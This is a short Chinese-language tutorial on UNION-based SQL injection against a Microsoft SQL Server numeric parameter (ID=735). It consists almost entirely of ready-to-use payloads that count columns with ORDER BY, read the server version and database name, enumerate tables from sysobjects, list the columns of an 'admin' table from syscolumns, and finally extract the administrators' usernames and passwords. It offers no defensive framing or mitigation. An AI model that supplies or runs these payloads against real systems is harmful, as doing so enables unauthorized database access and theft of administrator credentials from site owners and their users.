

  以一个数字型注入点为例( 暂时假设这个数字型注入点对单引号也没有过滤)

  先用 order by 猜SQL所查询字段数,并用Union验证(这里直接Select当前数据库下的sysobjects系统表)

  ID=735 order by 8

  ID=-735 union select 1,2,3,4,5,6,7,8 from sysobjects


  ID=-735 union select 1,2,3,4,5,6,7,8 from master.dbo.sysobjects



  ID=-735 union select 1,@@version,db_name(),4,5,6,7,8 from sysobjects


  接着查询表名(从0开始增加第二个top N的数字就可以遍历当前数据库表名了)

  ID=-735 union select 1,2,(select top 1 name from sysobjects where xtype='u' and name not in(select top 0 name from sysobjects where xtype='u')),4,5,6,7,8 from sysobjects


  ID=-735 union select 1,2,(select top 1 name from [dbname]..sysobjects where xtype='u' and name not in(select top 0 name from [dbname]..sysobjects where xtype='u')),4,5,6,7,8 from sysobjects


  继续猜字段名(从0开始增加第二个top N的数字就可以遍历admin表的字段名了)

  ID=-735 union select 1,2,(select top 1 name from syscolumns where id in (select id from sysobjects where name='admin') and name not in (select top 2 name from syscolumns where id in (select id from sysobjects where name='admin'))),4,5,6,7,8 from sysobjects


  剩下的就简单啦,依次把管理员用户名和密码就可以Union出来了(仍然修改第二个top N来遍历字段)


  ID=-735 union select top 1 1,name,psw,4,5,6,7,8 from admin where name not in (select top 0 name from admin)



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